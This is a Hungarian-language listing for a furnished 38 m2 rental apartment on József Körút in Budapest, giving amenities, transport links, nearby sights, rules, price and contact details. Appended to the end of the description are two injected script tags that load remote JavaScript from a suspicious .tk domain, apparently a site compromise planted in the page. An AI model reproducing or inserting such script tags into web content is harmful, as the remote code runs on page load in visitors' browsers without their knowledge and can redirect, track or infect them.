Kőrúti Apartmanok Budapest Júlia Lak

Inside Apartment
  • Complete Inside view

Budapesti körúti apartmanok 1-4 személy részére, felújított, felszerelt lakások a József Körúton, a szív, transzplantációs, szem, női Klinikák, Nemzeti Múzeum, Iparművészeti Múzeum, Andrássy, SOTE, Pázmány Péter, Református Egyetemhez közel. Egy szoba + galéria, konyha, fürdőszoba, alapterülete összesen 38 m2. Nem dohányzó apartmanok!
Az Aliz, Klára Albert és Petra lakások ugyan abban az épületben vannak (a földszinten, I., II., és III. emeleten), mindegyik alkalmas 1-4 személy elszállásolására. Ebben az épületben akár 20 személyt is tudunk elszállásolni.
Felszerelés:
Fekvőhelyek: 1 francia ágy a galéria szintjén, 1 db. két személyes kanapé az alsó szinten.
Szatellit TV, Elektromos tűzhely, Mikró, Hűtő, Kávéfőző, Kenyérpirítós, saját fürdőszoba, Porszívó, Ventilátor, Kaputelefon, Hajszárító, Wi-Fi (ingyenes), Ágynemű és törölköző biztosított. Lakásunk a Józsefváros Palota Negyedében található, egy városképileg védett, 1898.-ban épült eklektikus palotában, a József Kőrút 47 sz. alatt, a Krúdy Gyula utca sarkán. A ház nagyon szép, liftes, az ALBERT apartman annak földszintjén van, udvari fekvésű, csendes kis lakás.
Nagyon jó közlekedés, a 4-6 villamosok HARMINCKETTESEK TERE megállója a ház előtt van, a Corvin Sétány, Kálvin tér és Blaha Lujza tér metróállomások cca. 5' vannak. A 83 troli, melynek a Nagy Csarnok a végállomása 50 méterre, szintén a ház előtt található az éjszakai busz megállója.Tömegközlekedéssel könnyen elérhetők a: Hősök tere, Széchenyi Fürdő, Parlament, Szent István Bazilika, MUPA. Kiváló szórakozási lehetőségek, olcsó vendéglők, romkocsamák alig 5 percre találhatók, a Ráday, Váci, utca. A Krúdy Gyula utca 2009.-től sétáló utca lett.
A sarkon egy nagy ABC, patika, bankok, éjjel-nappali ABC, egyéb üzlet, templom, kórház, fogászati klinikák, közel a Szabó Ervin Könyvtár. Csendes, biztonságos környék, térfigyelő kamerákkal.
A kőrút másik oldalán, a Horváth Mihály tértől kezdődően, a parkolás ingyenes. Őrzött parkoló a Pollák Mihály téren.
Megjegyzés:
Lakásainkban házi állat, a tulajdonos előzetes hozzájárulásával bevihető. Az ügyfél kérésére, transzfert biztosítunk a repülőtérről, NÉPLIGET Busz pu., Keleti pu, etc..
Legrövidebb foglalási idő: 2 nap.
Áraink tartalmazzák az ÁFÁ.-t. Az idegenforgalmi adót áraink nem tartalmazzák, ennek mértéke a nettó szállásdíj 4%. val egyenlő és a helyszínen kell kifizetni.
Beszélünk: English, Français, Deutsch, Magyar, Italiano, Română.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Type: 
szállás
Size: 
38 m2
Floor: 
földszint
Rooms: 
1
Cím: 
Budapest VIII., József Körút
47.
Price: 
10500.00 Ft / night
Phone: 
+36 309-148-459
E-mail: 
Skype: 
Properties: 
Névjegy: 
CAPTCHA
This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.